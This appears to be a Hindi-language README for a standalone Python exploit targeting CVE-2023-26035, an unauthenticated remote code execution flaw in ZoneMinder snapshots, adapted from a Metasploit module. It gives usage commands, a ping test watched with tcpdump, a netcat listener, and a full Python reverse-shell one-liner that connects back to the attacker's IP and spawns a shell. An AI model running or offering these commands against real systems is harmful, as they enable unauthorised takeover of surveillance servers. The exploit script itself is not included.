
CVE-2023-26035 के लिए शोषण जो ZoneMinder < 1.36.33 और < 1.37.33 को प्रभावित करता है
यह ZoneMinder स्नैपशॉट्स को प्रभावित करने वाला एक अप्रमाणित दूरस्थ कोड निष्पादन (RCE) है।
यह CVE-2023-26035 के लिए एक शोषण है।
ZoneMinder < 1.36.33 और
ZoneMinder < 1.37.33।

python3 zoneminder.py http://target
python3 zoneminder.py http://target command
ping के साथ कमांड निष्पादन का परीक्षण करेंलक्ष्य से जुड़े इंटरफ़ेस (यहाँ tun0) पर tcpdump चलाएं और ICMP पैकेट के लिए फ़िल्टर करें:
sudo tcpdump -i tun0 icmp
फिर अपने IP पर ping निष्पादित करें। उद्धरण चिह्न " का उपयोग करना सुनिश्चित करें, अन्यथा कमांड सही ढंग से व्याख्या नहीं की जाएगी।
python3 zoneminder.py http://target "ping -C 4 your_ip"
netcat के साथ लिसनर बनाएँ:
nc -lvnp 1337
एक रिवर्स शेल वन-लाइनर का उपयोग करें:
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"
और अधिक जानकारी https://revshells.com पर।
शोषण requests और BeautifulSoup का उपयोग करता है।
इसे इसके साथ स्थापित करें:
python3 -m pip install requests beautifulsoup4
मैं बस एक स्वतंत्र शोषण चाहता था जिसमें Metasploit की आवश्यकता नहीं थी।
यह स्क्रिप्ट https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb से ली गई है।
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr